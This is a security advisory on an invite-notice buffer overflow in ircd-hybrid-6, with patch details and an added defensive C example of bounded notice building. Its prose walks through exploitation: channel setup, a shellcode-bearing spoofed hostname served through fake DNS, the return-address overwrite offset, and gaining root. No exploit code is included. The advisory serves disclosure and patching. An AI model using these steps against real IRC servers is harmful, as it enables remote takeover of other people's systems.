COMMAND
ircd
SYSTEMS AFFECTED
Some IRC servers
PROBLEM
This vulnerability was discovered by jduck and stranjer of w00w00.
After discussing the vulnerability, it was reported to Dianora by
jduck and fixed. Hopefully the vulnerable irc servers have been
fixed. If not, it's unfortunate Dianora didn't notify the
vulnerable irc servers or they didn't take these 2 months to fix
themselves. The vulnerability is in the invite handling code
(m_invite). In a channel with operators (ops) and modes +pi
(paranoid + invite-only), a channel invitation is reported to all
other operators. The buffer used to store the invitation notice
can overflow its boundaries by up to 15 bytes. Steps:
1. Client 1 (9chars!10chars@trivial) joins #199chars
2. Client 2 (trivial!trivial@trivial) joins #199chars
3. Client 1 sets mode #199chars +pio Client 2
4. Client 1 invites Client 3 (9chars!10chars@63chars) to #199chars
Note: client 1 and client 3 should _not_ be from the same host.
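As an added illustration in C (not code from the advisory or from ircd-hybrid), the following shows the defensive side of the bug: a hypothetical invite-notice builder that bounds its write and refuses a notice that does not fit, checked against the field lengths the steps above use (nick 9, user 10, host 63, channel 199). The notice wording and the buffer size NOTICE_BUF are assumptions; the real ircd-hybrid buffer and format are not reproduced here.

```c
#include <stdio.h>
#include <string.h>

/* Field limits from the advisory's steps; NOTICE_BUF is a hypothetical
 * buffer size for this illustration, not the one used by ircd-hybrid. */
#define NICKLEN 9
#define USERLEN 10
#define HOSTLEN 63
#define CHANLEN 199
#define NOTICE_BUF 256

/* Worst-case length of "nick!user@host invites nick!user@host to #chan",
 * derived from the limits alone (no trailing NUL). */
size_t invite_notice_max_len(void)
{
    size_t mask = NICKLEN + 1 + USERLEN + 1 + HOSTLEN;   /* 84 */
    return mask + strlen(" invites ") + mask + strlen(" to ") + CHANLEN;
}

/* Hardened builder. The unsafe pattern behind the advisory is sprintf()
 * into a fixed buffer; snprintf() plus a truncation check turns a silent
 * overflow into a refused notice. Returns length, or -1 if it won't fit. */
int build_invite_notice(char *out, size_t outlen, const char *inviter,
                        const char *invitee, const char *chan)
{
    int n = snprintf(out, outlen, "%s invites %s to %s", inviter, invitee, chan);
    if (n < 0 || (size_t)n >= outlen) {
        if (outlen) out[0] = '\0';
        return -1;
    }
    return n;
}

/* The advisory's max-length case (9/10/63/199) through the hardened path:
 * -1 means the oversized notice was refused instead of overflowing. */
int worst_case_result(void)
{
    char nick[NICKLEN + 1], user[USERLEN + 1], host[HOSTLEN + 1];
    char chan[CHANLEN + 1], mask[128], out[NOTICE_BUF];
    memset(nick, 'n', NICKLEN); nick[NICKLEN] = '\0';
    memset(user, 'u', USERLEN); user[USERLEN] = '\0';
    memset(host, 'h', HOSTLEN); host[HOSTLEN] = '\0';
    memset(chan, 'c', CHANLEN); chan[0] = '#'; chan[CHANLEN] = '\0';
    snprintf(mask, sizeof mask, "%s!%s@%s", nick, user, host);   /* 84 chars */
    return build_invite_notice(out, sizeof out, mask, mask, chan);
}
```

Comparing invite_notice_max_len() with the buffer size is the check that was missing: 380 bytes of worst-case notice against a smaller fixed buffer is the mismatch, whatever the real sizes were.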
With exploit, client 3 (compile/run hostname.c) first, then
compile/run ircdexp.c.
Client #1's server = vulnerable irc server (such as irc.arpa.com)
Client #2's server = trivial
Client #3's server = ComStud irc server (such as irc.prison.net),
because it allows shellcode chars in hostname
Using the following spoofed host (59 chars):
shellcodeshellcodeshellcodeshellcodeshellcodeshellcode.AAAA
[The ComStud ircd will check for a '.']
Here, EIP = 0x41414141 (AAAA). The other registers are negligible.
The hostlen is actually 63 bytes, but for this specific overflow,
EIP is overwritten at buf[54-58]. We have to take stdout/stdin
descriptors into consideration. We are very limited in size
(only have 54 bytes for shellcode), so we can't fit bind
shellcode. Instead, we took the standard Linux x86 shellcode,
dropped exit handling code, added a close'd stdin, dup'd cptr->fd
(cptr is the first argument passed to m_invite). Since we only
have 54 bytes to work with, we can't fit code in to close stdout
and dup cptr->fd, so output will be sent to whatever terminal
ircd was started from. If you do not wish for the output to be
seen, redirect everything (via '>') to /dev/null.
As for how to go about spoofing, you have options:
1) Use the old DNS poison caching method
2) Use custom "fake binds" that will just pass on your
shellcode as a hostname in response to a DNS query (idea
from nyt).
Option #2 is the approach we will take (hostname.c generates the
shellcode we'll use). This will work fine as long as your
IP/hostname hasn't already been cached. Because these "fake
binds" are pretty popular (or have been in the past), they should
be easy to come by and are outside the scope of this advisory. So
the full steps are: the client with the spoofed hostname connects to
a ComStud ircd server (such as irc.prison.net), another client
connects to any (trivial) server, and another client connects to the
target ircd-hybrid-6 server (such as irc.arpa.com). Once the channel
is +pi (and your channel, ident, username, etc. are all the right
length), invite the client with the spoofed hostname. Fine-tune until
you have root. Mimed exploit code follows.
SOLUTION
The buffer mentioned above was introduced in ircd-hybrid-6b17 and
fixed in ircd-hybrid-6b75. All EFnet servers have upgraded or
patched. Hybrid-6 is still in semi-private beta and has not been
released publicly. The current release version of Hybrid is
ircd-hybrid-5.3p7, which is not vulnerable.